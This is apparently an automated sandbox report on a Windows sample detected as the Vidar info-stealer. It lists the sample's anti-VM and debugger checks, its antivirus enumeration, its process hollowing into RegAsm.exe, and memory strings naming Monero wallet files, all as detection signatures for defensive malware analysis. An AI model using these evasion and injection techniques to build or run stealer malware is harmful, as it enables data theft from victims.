Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe, 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 23D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 43D0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,

3_2_0040180D

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5020

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,

3_2_00410FBA

Source: C:\Users\user\Desktop\file.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: VMware
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.9.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.9.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW A
Source: Amcache.hve.9.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.9.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.9.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.9.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.9.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.9.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx{
Source: Amcache.hve.9.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_3-21714
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API call chain: ExitProcess graph end node			graph_3-21699

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041BC21 malloc,SetFilePointer,LdrInitializeThunk,CreateFileA,CreateFileMappingA,MapViewOfFile,CloseHandle,

3_2_0041BC21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

3_2_0041D016

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0042582E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041859A mov eax, dword ptr fs:[00000030h]	3_2_0041859A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D016 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041D98C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041D98C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042762E SetUnhandledExceptionFilter,	3_2_0042762E

Source: C:\Users\user\Desktop\file.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")
Source: file.exe, Program.cs	Reference to suspicious API methods: GetProcAddress(LoadLibraryA("kernel32.dll"), "VirtualProtectEx")

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_023D212D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_023D212D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 931008	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0040111D cpuid

3_2_0040111D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: LdrInitializeThunk,GetLocaleInfoA,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: LdrInitializeThunk,GetLocaleInfoW,LdrInitializeThunk,GetLocaleInfoW,GetACP,	3_2_0042B0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B1C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: LdrInitializeThunk,GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,__malloc_crt,LdrInitializeThunk,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,LdrInitializeThunk,__calloc_crt,GetLocaleInfoW,_free,LdrInitializeThunk,GetLocaleInfoW,	3_2_004253E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_0042749C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesA,	3_2_0042B556
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E56F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427576
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,LdrInitializeThunk,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428DC4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,LdrInitializeThunk,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: _strlen,_strlen,LdrInitializeThunk,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B623
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoA,	3_2_0042E6A4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041C0E9 lstrcpyA,GetLocalTime,SystemTimeToFileTime,

3_2_0041C0E9

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410C53 GetProcessHeap,HeapAlloc,GetUserNameA,

3_2_00410C53

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410D2E GetTimeZoneInformation,

3_2_00410D2E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.9.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: RegAsm.exe, 00000003.00000002.2185117153.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2185117153.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.9.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

Remote Access Functionality

Yara detected Vidar stealer

Source: Yara match	File source: 0.2.file.exe.33d5570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.33d5570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2183942555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1775378329.00000000033D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5676, type: MEMORYSTR

Mitre Att&ck Matrix

